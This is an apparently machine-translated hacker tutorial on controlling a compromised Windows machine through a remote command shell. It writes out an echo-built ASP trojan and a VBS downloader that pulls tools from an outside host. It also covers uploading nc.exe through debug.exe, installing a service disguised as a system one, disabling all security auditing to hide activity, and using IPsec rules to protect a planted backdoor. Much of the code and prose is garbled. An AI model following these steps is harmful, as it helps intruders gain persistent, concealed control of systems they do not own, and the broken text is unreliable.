table of Contents
1 Introduction
2, file transfer
3, system configuration
4, network configuration
5, software installation
6, Windows script
7, demonstration
Preface CMD Shell (Command Line Interaction) is a hacker eternal topic, which has a long history and grows in success. This article is intended to introduce and summarize some ways to control the Windows system under the command line. These methods are implemented using the tools that are self-contained as much as possible. File Transfer CMD shell for overflow vulnerabilities, the biggest problem is how to upload files. Due to the popularity of worm, 139 or 445 ports required to connect IPC $ are blocked. Plus the WinXP system has strengthened the protection of IPC $, which is basically invalid through IPC $ and the means of sharing the upload file by IPC $ and the default. FTP and TFTP are two feasible methods, which are not known by everyone, this article does not introduce. There are three ways to familiarize, as a summary, I will mention it:
1. Write an ASP Trojan with an echo command. The premise is of course IIS on the target host. The general ASP Trojan "volume" is large, not suitable for writing files directly with the echo command, here I offer a small. Give the Echo version directly:
@echo ^> Up.asp
Note that there is only one line and there is no return in the middle. The generated UP.ASP cannot be accessed with a browser, only the following script:
With wscriptif.Aguments.count> dl.vbs@echo w.Open "get",. arguments (0), 0: w.send: if W.Status ^> 200 Then. ERROR: W.STATUS: .quit >> DL.vbs@echo aso.type = 1: aso.open: aso.write w.Responsebody: aso.savetofile .arguments (1), 2: End with >> DL.VBS
Example - Download PS.exe and save it to C: / Path:
Cscript dl.vbs http://www.sometips.com/soft/ps.exe c: /path/ps.exe
Note that this is executed in the remote shell.
4, ECHO is encoded any file, then restore the script Debug. The two methods before, and they cannot guarantee through the firewall. Moreover, unless the web server, the general web resources are provided in the form of a compressed file. If the target host does not decompress the tool, it is still nothing. So only "killer"!
The echo command aggluting the direction X enact can be written to characters that the ASCII code is less than 128, but it is greater than or equal to 128. The remote host can be easily written only if the local file is reorganized to "encode" as a displayable character. It is the first to think that Base64 encoding, that is, the encoding method of the Email attachment. However, VBS does not support bit X, so encoding and decoding are more complicated. What is more trouble is that the script has a poor ability to handle files in binary flow. (AdoDb.Stream can write files in a stream, but I can't construct the corresponding data type. The binary data stream can be converted to a string with the MIDB function, but it doesn't work. I spent two days, still I can't solve this. Question. If anyone can write any byte data to the file with VBS or JS to the file, please advise.)
Helpless only, debug.exe is going out. Many people know that I don't introduce, give out the results directly - code script:
FP = WScript.Arguments (0) fn = Right (fp, len (fp) -instrrev (fp, "/")) with createObject ("adodb.stream"). TYPE = 1: .Open: .loadFromfile FP: STR = .read: SL = lenb (str) end withsll = sl mod 65536: SLH = SL / 65536With CreateObject ("scripting.filesystemObject"). OpenTextFile (FP & ". Bat", 2, true) .write "@echo str = "" "" for i = 1 to SLBT = ASCB (MIDB (STR, I, 1)) IF BT> Debug.vbs " VBCRLF " @ echo "" Next.writeLine "" >> Debug.vbs " VBCRLF "@ echo with wscript.stdout: r = vbcrf" _ ": for i = 1 to len (str) Step 48: .write" "e" " HEX (256 (i-1) / 2) "_ ": for j = i to i 46 step 2: .write "" " MID (STR, J, 2): Next: .write r: Next >> Debug.vbs" .writeline "@echo "RBX" " R " " HEX (SLH) " " R " "RCX" " R " " " "" " R " n debug. TMP " R " "W" " " "Q" " R: End with" _ ">> Debug.vbs && Cscript // NOLOGO Debug.vbs | Debug.exe> Nul && Ren Debug.TMP" "" & Fn & Fn & Fn "" & del debug.vbs "end with saves it as echo.vbs. Assume that you want to upload nc.exe, then enter the command at the local command line:
Cscript echo.vbs nc.exe
You can also drag and drop the icon of the file you want to transfer to the icon of the script file. A little time, a nc.exe.bat will be generated under the current directory. Open it with the editing tool such as Notepad, you can see the following:
@echo str = "4D5A90000300000004000000FFFF0000B800000000000000 400000000000000000000000000000000000000000000000000000000000 000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070 726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F 64652E0D0D0A2400000000000000" _ >> debug.vbs @echo "504500004C010400B98EAE340000000000000000E0000F010B0 10500009800000062000000000000004C00000010000000B000000000400 000100000000200000400000000000000040000000000000000300100000 400000000000003000000000010000010000000001000001000000000000 0100000000000000000000000" _ >> debug.vbs @echo "002001003C00000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000 00000A021010064010000000000000000000000000000000000000000000 0000000002E74657874000000" _ >> debug.vbs @ Echo "70970000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000 0402E646174610000004452000000C 00000003E000000A20000000000000000000000000000400000C02E69646 1746100005C07000000200100 "_ >> debug.vbs ........................ (omitted several lines) ............ @ echo " ">> debug.vbs@echo with wscript.stdout: r = vbcrlf: for i = 1 to Len (STR) Step 48: .write "e" HEX (256 (i-1) / 2): for j = i to i 46 step 2: .write " MID (Str, J , 2): Next: .write r: Next >> Debug.vbs@echo .write "RBX" R "0" R "RCX" R "E800" R "n debug.tmp" r "W " R " Q " r: end with >> Debug.vbs &&
Cscript // NOLOGO Debug.vbs | Debug.exe> Nul && Ren Debug.tmp "Nc.exe" & del Debug.vbs "Copy-" Switch to Remote Command Line Window - "Paste. If the network speed is not very slow, the entire upload process takes approximately 20 seconds.
Some descriptions: 1. Large file transmission is unstable, and the shell may die. Therefore, the smaller the file, the better. It is recommended that the original file should not exceed 100KB. 2. Before transferring big files, you can pass a small file as a "warm body", so that 16 virtual machine NTVDM.EXE resides in the background. After all the files are finished, see the NTVDM process to kill the NTVDM process. 3. Some cmd shells need to attach two carriages through each command, and nc.exe.bat can't be used directly. 4, the length of a single command is limited, so you can't use only one Echo to complete all tasks. Moreover, for the CMD shell provided by the NC, a slightly longer command will automatically exit (overflow?). You can modify 128 in the I MOD 128 = 0 statement to adjust the length of each echo command. Each Echo character is multiplied by this number by 2.5, and there is no script participation in the decoding process. The purpose of using scripts is to reduce the amount of data transmitted (because data is compressed). If there is time, I will write a better script to enhance data compression capabilities, and increase data check functions.
I can upload the document. Of course, everything is good, but many X rooted Windows comes more convenient. Don't forget the Windows itself when you look for tools you need.
System Configuration This section includes three aspects: registry, service, and group policies.
Let's talk about the registry first. Many command lines accessing the registry are interactive. The shell generated by overflows generally cannot redirect the input / output stream again, so it cannot be used. It is enough to use regedit.exe with the system.
1. Read the registry first to export the registry entry you want to query, then view Type, such as:
C: /> regedit / e 1.REG "HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / CONTROL / TERMI NAL Server / WinStations / RDP-TCP"
C: /> Type 1.Reg | Find "portnumber" "portnumber" = dword: 00000d3d
C: /> DEL 1.Reg
So the port of the terminal service is 3389 (hexadecimal D3D)
2, modify / delete the registry key first Echo a REG file, then import, such as:
Echo Windows Registry Editor Version 5.00> 1.Regecho. >> 1.Regecho [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Telnet Server / 1.0] >> 1.Regecho "TelnetPort" = DWORD: 00000913 >> 1.Regecho "NTLM" = DWORD: 00000001 >> 1.Regecho. >> 1.RegRegedit / s 1.reg
Change the Telnet service port to 2323 (hexadecimal 913), NTLM authentication method is 1.
To delete an item, decrease the number in front of the name, such as:
[-HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / SERV-U]
To delete a value, use a minus sign after the equal sign, such as:
[HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] "Kavrun" = -
3. Use the INF file to access the three x X X of the registry on the registry, you can also use the INF file below:
[Version] Signature = "$ WINDOWS NT $" [DefaultInstall] AddReg = My_AddReg_NameDelReg = My_DelReg_Name [My_AddReg_Name] HKLM, SOFTWARE / Microsoft / TelnetServer / 1.0, TelnetPort, 0x000100 01,2323HKLM, SOFTWARE / Microsoft / TelnetServer / 1.0, NTLM, 0x00010001 , 1 [MY_DELREG_NAME] HKLM, System / CurrentControlset / Services / Serv-UHKLM, Software / Microsoft / Windows / CurrentVersion / Run, Kavrun
Write it into C: /Path/reg.inf and then "Install" with the following command:
Rundll32.exe setupapi, installhinfsection defaultinstall 128 C: /Path/reg.inf
Some descriptions: 1, [Version] and [DefaultInstall] are required, addReg and Delreg at least one. MY_ADDREG_NAME and MY_DELREG_NAME can be customized. 0x00010001 Represents the REG_DWORD data type, 0x00000000 or omitted the item (reserved comma) represents REG_SZ (string). 0x00020000 represents REG_EXPAND_SZ. 2323 can also be replaced with 0x913. For more information on the INF file, you can refer to the DDK help documentation. 2, installhinfsection is sensitive. There is only one comma between it and setupapi, no spaces. 128 Indicates a given path, which other values and meanings are met in MSDN. Special note, the last parameter must be the full path to the INF file, do not use a relative path. 3, the projects in the Inf file are not sensitive.
Next, the service is said. If you want to start or stop the service, you can use the NET command. But want to increase or delete the service, you need to use SC, INSTSRV.EXE, XNET.EXE and other tools. These tool systems are not comes with (XP and 2003 Self-strap SC). Although the import registry is ok, the effect is not good, after the reason? * 岬 健; hose? * INF file from the horse.
Add a service:
[Version] Signature = "$ WINDOWS NT $" [DefaultInstall.Services] AddService = inetsvr ,, My_AddService_Name [My_AddService_Name] DisplayName = Windows Internet ServiceDescription = support for Internet Information Services management. ServiceType = 0x10startType = 2erRorControl = 0ServiceBinary =% 11% / inetsvr.exe
Save as inetsvr.inf, then:
Rundll32.exe setupApi, installhinfaxt DEFAULTINSTALL 128 C: /PATH/INETSVR.INF This example adds a service called INETSVR (if it is very like systematic services, huh).
Some explanations: 1. The last four are the service type: 0x10 is a stand-alone process service, 0x20 is a shared process service (such as SVCHOST); launch type: 0 When the system boots, load, 2 by SCM (service Control Manager) Automatically start, 3 manual start, 4 disabled. (Note, 0 and 1 can only be used for drivers) Error control: 0 ignore, 1 Continue and warned, 2 Switch to LastknownGood setting, 3 blue screen. Server location:% 11% indicate the System32 directory,% 10% represents the system directory (WinNT or Windows),% 12% is the drive directory System32 / Drivers. See DDK at other values. You can also use the full path directly without variables. These four items must be there. 2. Six projects in the examples, as well as LoadOrderGroup, Dependencies, etc. Not often used, so don't introduce it. 3, there are two commas behind the inetsvr because there is an uncommon parameter Flags in the middle.
Delete a service:
[Version] Signature = "$ Windows NT $" [DefaultInstall.Services] DELSERVICE = INETSVR
Very simple, isn't it?
Of course, you can also achieve your goals by importing registry. But INF has its own advantage. 1. Export a registry key of a system comes with service, you will find that its execution path is like this: "imagePath" = HEX (2): 25, 00, 53, 00, 79, 100, 73, 00, 74, 00, 65, 6D, 00, 52, 100, 6F, 00, 6F, 00, / 74, 200, 5, 5C, 00, 73, 100, 79, 100, 73, 100, 74, 00 65,00, 6d, 00, 33, 100, 32, 100, 5c, 00, 74, / 00, 6C, 00, 6E, 00, 74, 3, 73, 100, 76, 100, 72, 100, 2E, 00, 65, 00, 78, 00, 65, 00, 00, and 100 readability is too bad. In fact, it is% systemroot% / system32 / tlntsvr.exe, but the data type is REG_EXPAND_SZ. ThisPath is obviously inconvenient when manually introduced into the registry to increase the service. If you use the reg_sz generation? * 嵊 嵊 ┪ 狻 苡 苡 淞 淞 恕 <<胕 胕 胕 胕................. 这个... 这个 这个 这个 这个 这个 这个 这个 这个 这个. 没有 这个2, the most critical is, like a tool such as SC, the effect of INF file is immediate, and it must be restarted after importing REG. 3, INF file automatically adds a security subkey to the service's registry key so that it looks more like a service comes with the system.
In addition, AddService and DelService and AddReg, DELREG can be used at the same time and reuse. You can increase and delete multiple services and registry items at the same time. Detailed content or see DDK.
Last to the group strategy. Group Policy is an important means of establishing a Windows security environment, especially in a Windows domain environment. An excellent system administrator should be able to master and apply a group strategy. Accessing group policies under window interface With gpedit.msc, with successdit.exe in the command line. First look at the successdit command syntax: SECEDIT / analog proportit / validateSecEdit / refreshPolicy 5 commands feature the analysis group policies, configure group policies, export group policies, verify template syntax, and update group policies. SECEDIT / REFRESHPOLICY is replaced by gpupdate in XP / 2003. These ordered the specific grammar yourself in the command line.
Simply requiring the registry only that the registry is different, the access group policy except that there is a template file (or INF), there is also a secure database file (SDB). To modify the group policy, you must first import the template into the secure database, and then refresh the group policy by applying the secure database. Let's see an example:
Suppose I want to set the minimum value of the password to 6, and enable the "Password must meet the complexity requirements", then write such a template:
[Version] signature = "$ chicago $" [system access] minimumpasswordLength = 6PasswordComplexity = 1
Save as gp.inf, then import:
SECEDIT / CONFIGURE / DB GP.SDB / CFG GP.INF / Quiet
After this command is executed, a gp.sdb will be generated in the current directory, it is "Intermediate Product", you can delete it. The / quiet parameter represents "quiet mode" and does not generate a log. But according to my test, this parameter in 2000SP4 does not seem to work, and XP is normal. The log is always saved in% windir% / security / logs / scsrv.log. You can also specify the log yourself so you can then delete it. such as:
Secedit / configure / db gp.sdb / cfg gp.inf / log gp.logdel gp. *
In addition, before importing the template, you can analyze if the grammar is correct:
SECEDIT / VALIDATE GP.INF
So how do you know the specific syntax? Of course, I am looking for MSDN. There are also lazy ways because the system comes with some security templates, under the% Windir% / Security / Templates directory. Open these templates, basically contain commonly used security settings, and understand.
Again for example - close all "audit strategies". (The event it review will be recorded in "security" in the event viewer). Echo version:
Echo [Version]> 1.infecho signature = "$ chicago $" >> 1.infecho [Event Audit] >> 1.infecho auditsystemevents = 0 >> 1.infecho auditobjectAccess = 0 >> 1.infecho auditprivilegeute = 0 >> 1.infecho AuditPolicyChange = 0 >> 1.infecho AuditAccountManage = 0 >> 1.infecho AuditProcessTracking = 0 >> 1.infecho AuditDSAccess = 0 >> 1.infecho AuditAccountLogon = 0 >> 1.infecho AuditLogonEvents = 0 >> 1. INFSECEDIT / Configure / DB 1.SDB / CFG 1.inf / log 1.log / quietdel 1. * Perhaps someone will say: Group Policy is not saved in the registration table, why not directly modify the registry? Because not all group policies are saved in the registry. For example, "Audit Strategy" is not. You can compare changes to the registry before and after the policy with RegSnap. The result of my test did not change anything. Only "Management Template" is completely based on the registry. Moreover, knowing the specific location, which method is not complicated.
For example, the "Local Policy" "Security Options" of the XP and 2003 adds a "local account sharing and security mode" policy. The default settings under XP are "only guest". That's why IPC $ IPC $ IPC $ IPC $ with the administrator account is still only the reason for Guest rights. You can modify it to "Classic" by importing the REG file:
Echo Windows Registry Editor Version 5.00> 1.Regecho [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / CONTROL / LSA] >> 1.Regecho "Forceguest" = DWORD: 00000000 >> 1.RegRegedit / s 1.Regdel 1.Reg
The corresponding INF should be:
Echo [Version]> 1.infecho signature = "$ chicago $" >> 1.infecho [registry value] >> 1.infecho machine / system / currentcontrolset / control / lsa / forceguest = 4, 0 >> 1.infsecedit / Configure / db 1.sdb / cfg 1.inf / log 1.logdel 1. *
Questions about reading a group strategy under the command line. The default secure database is located in% windir% / security / database / successdit.sdb, export it to the INF file:
SECEDIT / EXPORT / CFG GP.INF / LOG 1.log
The database does not use the / dB parameter to specify the database is the default. Then check gp.inf.
However, this is just a part of the group policy (ie "Windows Settings"). Moreover, if a policy is not configured, it will not be exported. For example, "Rename System Administrator Account", only NewadministRatorName = "***" appears in the INF file only defined. Other group policies that cannot be exported are only available by accessing the registry.
This approach is invalid under XP and 2003 - can be exported but the content is essential. unknown reason. According to the official information, XP and 2003 display group strategy RSOP (Group Policy Results Set). The corresponding command line tool is GPRESULT. However, it obtains a group policy that is attached (from the domain) when the system is started, and the single-machine test results are still "empty". So, if you want to know if some group policies are set, only write an infrote, then use Secedit / Analyze, then view the log. Network Configuring Windows comes with a lot of command line tools. For example, everyone is familiar with ping, tracert, ipconfig, telnet, ftp, tftp, netstat, and is not familiar with NBTSTAT, PATHPING, NSLOOKUP, Finger, Route, Netsh ... ... These commands can be divided into three categories: network detection (such as ping), network connection (such as Telnet) and network configuration (such as Netsh). In the past two relatively simple, this article only introduces two network configuration tools.
Netsh uses Netsh in remote shell to first solve a problem of interactive mode. As mentioned earlier, many shells cannot redirect the output output, so command line tools such as FTP cannot be interacted in this environment. The solution is that the general interactive tool allows the script (or a reply file). For example, ftp -s: filename. Netsh is also true: Netsh -f filename.
Netsh commands have a lot of features, you can configure IAS, DHCP, RAS, WINS, NAT Server, TCP / IP protocol, IPX protocol, route, etc. We are not administrators, there is no need to know so much, just use Netsh to understand the network configuration information of the target host.
1, TCP / IP configuration
Echo Interface IP> Secho Show Config >> SNETSH -F SDEL S
Thus, you can understand that the host has multiple network cards and IP, whether it is dynamically assigned IP (DHCP), how much the intranet IP is (if any). This command is similar to IPConfig / ALL.
Note that the following commands require the target host to launch the RemoteAccess service. If it is disabled, please let go of the import registry, then Net Start RemoteAccess
2, ARP
Echo Interface IP> Secho Show ipnet >> SNETSH -F SDEL S
This is more information than the arp -a command.
3, TCP / UDP connection
Echo Interface IP> Secho Show Tcpconn >> Secho Show Udpconn >> SNETSH -F SDEL S
This group of commands is the same as NetStat -an.
4, NIC information If the Netsh command has other commands to replace it, what else does it exist? Here, this will not be replaced.
Echo Interface IP> SECHO SHOW Interface >> SNetsh -f SDEL S
Other features of Netsh, such as modifying IP, generally no need to use (if there is no IP, even if it is changed, "it is not called the way", so it is entirely slightly.
IPsec first needs to be pointed out that IPsec and TCP / IP filtering are different things, and everyone should not confuse. The TCP / IP screening is very limited, far less than IPsec flexible and powerful. Let's talk about how to control IPsec in the command line. The XP system uses IPsecmd, 2000 with IPSecpol. Unfortunately, they are not included in the system. IPseccmd In the Support / Tools / Support.cab of the XP System Installation Dry, IPSecpol is in 2000 Resource Kit. Moreover, you must use IPsecpol to bring two other files: IPSecutil.dll and Text2Pol.dll. Three files have a total of 119KB.
IPsec can be controlled by group policies, but I am looking for MSDN, and I have not found the syntax of the corresponding security template. The IPSec policy that has been configured is also not exported as a template. Therefore, the group strategy does not pass. IPsec settings are saved in the registry (HKEY_LOCAL_MACHINE / SOFTWARE / Policies / Microsoft / Windows / IPsec / Policy / Local), which can be configured to configure IPSec by modifying the registry. But many information is stored in binary form, reading and modification is difficult. In contrast, uploading command line tools is more convenient.
About IPSecpol and ipseccmd information, there are a lot of online, so this article is not detailed, just list some practical examples. In terms of setting IPsec policies, the syntax of the ipseccmd command is almost exactly the same, so only IPSecpol is:
1, defense RPC-DCOM attack
IPsecpol -p myfirewall -r rpc-dcom -f * 0: 135: TCP * 0: 135: UDP * 0: 137: UDP * 0: 138: UDP * 0: 139: TCP * 0: 445: TCP * 0: 445: udp -n block -w reg -x
This command closed the TCP135, 139, 445, and UDP135, 137, 138, 445 ports of the local host. The specific meanings are as follows :-P myfirewall Specifies the named MyFireWall-R RPC-DCOM specified rule named RPC-DCOM-F ... Establish 7 filters. * Represents any address (source); 0 means the native address (target); means a mirror (two-way) screening. Detailed syntax See IPSecpol -? - n Block Specifies Filter X as "Block". Note that Block must be uppercase. -w REG will be configured to the registry and is still valid after restarting. -x immediately activates the strategy.
2 to prevent ping
ipsecpol -p myfirewall -r antiaping -f * 0 :: icmp -n block -w reg -x
If the policy named MyFireWall already exists, the AntiPing rule will be added therefrom. Note that this rule also prevents the host PING others.
3, IP limitations for the back door hypothesis you installed the DameWare Mini Remote Control on a host. In order to protect it is not fed by the password or overflow by others, access to its service port 6129 should be restricted.
ipsecpol -p myfw -r dwmrc_block_all -f * 0: 6129: TCP-N block -w regipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.89 0: 6129: TCP-N Pass -w REG -X
This is only 123.45.67.89 to access the host's 6129 port. If you are dynamic IP, you should set the rule according to the range of IP assignment. such as:
ipsecpol -p myfw -r dwmrc_block_all -f * 0: 6129: TCP-N block -w regipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67. * 0: 6129: TCP-N Pass -w REG -X The IP access 6129 ports are allowed 123.45.67.1 to 123.45.67.254.
When writing rules, it should be particularly careful, don't block yourself. If you are not sure if the effect of a certain rule is, you can "leave the post" first use the planned task. E.g:
The C: /> Net Start Scheduletask Scheduler service is starting .. Task Scheduler service has started successfully.
C: /> TIME / T12: 34
C: /> AT 12:39 ipsecpol -p myfw -y -w reg New A job, its job ID = 1
Then, you have a 5 minute time to set a MyFW policy and test it. After 5 minutes, the planned task will stop this strategy. If the test results are not ideal, delete the policy.
C: /> ipsecpol -p myfw -o -w REG
Note that before deleting the policy, you must make sure it has stopped. If you don't stop it, even if you delete it, you will continue to take effect over a period of time. The duration depends on the refresh time of the policy, the default is 180 minutes.
If the test passes, then it will be enabled.
C: /> ipsecpol -p myfw -x -w REG
Finally, let's take a way to view the IPSec policy. For XP very simple, a command gets - IPSecmd show filters and IPsecpol has no query. Need to use a command line tool NetDiag. It is located in the 2000 system installation disk in Support / Tools / Support.cab. (I have uploaded three files, and I don't care more. )
NetDiag requires the support of the RemoteRegistry service. So start the service first:
Net Start RemoteRegistry
If you don't start RemoteRegistry, you will get an error:
Failed to get system information of this machine.
NetDiag This tool function is very powerful, and it is available for information about the network! However, the output information is sometimes too detailed, exceeding the output cache of the command line console cmd.exe, instead of each remote cmd shell can be paid by more command.
The command to view the IPsec policy is: NetDiag / debug / test: IPsec
Then a long string output information. The IPsec policy is at the end.
The software installs a software / tool installation process, which is generally just two things: copy files to a specific directory and modify the registry. As long as you understand the specific content, you can implement it under the command line. (Do not consider the registration activation after installation)
WinPCAP is a very common tool, but must be installed under the window interface. You can also find a version that you don't have to use the GUI (but there is a copyright page), in fact, we can do one yourself.
Take WinPCAP 3.0A as an example. It is easy to understand the entire installation process by comparing file systems and registry snapshots before and after installation. Remove the reverse mounting part, the key file has three: wpcap.dll, packet.dll and npf.sys. The front two files are located in the System32 directory, and the third is under System32 / Drivers. The change in the registry is to increase a system service NPF. Note that the system service (ie, drive) is not Win32 service. As a system service, it is also an increase in the primary key to increase under HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES. The latter only has only System identity by default. Fortunately, do not need to manually add it, WinPCAP will be automatically set. Even if you don't need to manually modify the registry, all things WinPCAP will complete themselves, just copy the three files to the appropriate location.
As an example, or demonstrate how to modify the registry: Using the INF files previously implemented.
[Version] Signature = "$ WINDOWS NT $" [DefaultInstall.Services] AddService = NPF ,, winpcap_svr [winpcap_svr] DisplayName = Netgroup Packet FilterServiceType = 0x1StartType = 3ErrorControl = 1ServiceBinary =% 12% / npf.sys
Save the above content as the _wpcap_.inf file. Write a batch _WPCAP_.BAT:
rundll32.exe setupapi, InstallHinfSection DefaultInstall 128% CD% / _ wpcap_.infdel _wpcap_.infif / i% CD% ==% SYSTEMROOT% / system32 goto COPYDRVcopy packet.dll% SYSTEMROOT% / system32 / copy wpcap.dll% SYSTEMROOT% / system32 / DEL PACKET.DLDEL WPCAP.DLL: COPYDRVIF / I% CD% ==% SystemRoot% / System32 / Drivers Goto endcopy npf.sys% systemroot% / system32 / drivers / del npf.sys: enddel% 0
Then use WinRAR to package all files (5) to self-resoluntative EXE, and set "Advanced Self-Decompression Options" -> "After Running" to _wpcap_.bat, the command line's WinPCAP installation package is completed.
Note that the last row of the batch has no return. Otherwise, you will not be deleted because you are running.
All software installations can basically use this idea. But there is also an exception, that is, the system patches are installed. Since the system patch is likely to be? * Hui 诒 诒 蚍 蚍 实 实 奈 胏 胏 胏 胏 实... 实. 实 实Fortunately, the Windows patch supports the command line installation. such as:
KB824146.EXE -N -Z -Q
-n does not keep backups -z not heavy -Q quiet mode
If there is a bunch of patches to play, then use the RAR to pack self-extracting files, plus a batch.
For %% f in (KB ??????. EXE) DO %% F in (KB ??????. EXE) DO DEL %% FDEL% 0
The Windows script has made a lot of things to do with scripts. Here is a few echo version of several common scripts.
1. Display system version @echo for each ps in getObject _> ps.vbs@echo ("Winmgmts: //./root/cimv2: win32_operatingsystem") .instance s_ >> ps.vbs@echo wscript.echo ps.caption ^ & "^ & Ps.Version: Next >> ps.vbscscript // NOLOGO PS.VBS & DEL PS.VBS
2, listed processes
@echo for each ps in getObject_> ps.vbs@echo ("Winmgmts: //./root/cimv2: win32_process")) .instances_ >> ps.vbs@echo wscript.echo ps.handle ^ & vbtab ^ & ps.name ^ & vbtab ^ & ps.execu TablePath: Next >> Ps.vbscript // NOLOGO PS.VBS & DEL PS.VBS
3, termination process
@echo for each ps in getObject_> pk.vbs@echo ("Winmgmts: //./root/cimv2: win32_process") .instances_ >> pk.vbs@echo if ps.handle = wscript.arguments (0) THEN WScript.echo Ps.Terminate: end if: next >> PK.vbs
To terminate the PID 123, use the following title: CScript PK.vbs 123
If a 0 is displayed, it means that the end is successful.
Then: Del Pk.vbs
4, restart the system
@echo for easy os in getObject_> rb.vbs@echo ("Winmgmts: {(shutdown)}! //./ root / cimv2: win32_operatingsyst em"). instances_ >> rb.vbs@echo os.Win32Shutdown (2 : Next >> RB.VBS & CScript // NOLOGO RB.VBS & DEL RB.VBS
5, list self-starting services
@echo for each sc in getObject ("WinMgmts: //./root/cimv2: win32_service") .instanc ES_> sc.vbs@echo if sc.startmode = "Auto" the wscript.echo sc.name ^ & " "^ & sc.pathname >> sc.vbs@echo next >> sc.vbs & cscript // NOLOGO SC.VBS & DEL SC.VBS
6, listing the service running
@echo for each sc in getObject ("Winmgmts: //./root/cimv2: win32_service") .instanc ES_> sc.vbs@echo if sc.state = "Running" Then Wscript.echo sc.Name ^ & " "^ & sc.pathname >> sc.vbs@echo next >> sc.vbs & cscript // NOLOGO SC.VBS & DEL SC.VBS7, the last start-up time
@echo for easy os in getObject _> bt.vbs@echo ("Winmgmts: //./root/cimv2: win32_operatingsystem") .instance s_ >> bt.vbs@echo wscript.echo Os.lastbootuptime: Next >> BT .vbs & cscript // nologo bt.vbs & del bt.vbs
The format of the display result is: YYYYMMDDHHMMSS ****** zZZZ_ year _ month time] second _ microsecond _ time zone
8, display system runtime
@echo for easy os in getObject_> rt.vbs@echo ("Winmgmts: //./root/cimv2: win32_perfrawdata_perfos_system") .INSTANCES_ >> RT.VBS@echo s = os.timestamp_sys100ns: l = LEN (s) : s = Left (s, l-7): for i = 1 to L-7 >> rt.vbs@echo t = t ^ & MID (S, I, 1) < ! - Endemo - & gt; = t / 86400: r = r ^ & D: t = T mod 86400: Next >> rt.vbs@echo wscript.echo cint® ^ & "D" ^ & T / 3600 ^ & " "H" ^ & T / 60 MOD 60 ^ & "M" ^ & T MOD 60 ^ & "S": Next >> rt.vbscscript // NOLOGO RT.VBS & DEL RT.VBS
This runtime is a 64-bit integer obtained from the performance counter that does not appear in 49.7 days.
The number of people in the lack of CMD shell is profound. This article hangs a universal skills, I hope to help you.
Maybe you know these methods, maybe you have a better way, I hope you can write it out and share it.
